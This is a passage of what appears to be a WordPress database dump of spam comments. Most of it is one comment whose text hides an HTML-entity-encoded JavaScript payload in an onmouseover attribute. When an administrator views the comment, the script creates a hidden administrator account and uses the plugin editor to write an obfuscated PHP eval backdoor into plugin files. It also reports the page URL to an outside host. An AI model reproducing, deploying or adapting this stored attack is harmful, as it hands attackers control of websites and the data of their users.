&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(149, 1, 'biezou', 'miwmgt@gmail.com', 'http://www.facebook.com/inaaapnte2b', '115.113.174.21', '2015-11-11 21:40:58', '2015-11-11 21:40:58', 'Hi nice ar zsAk<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#11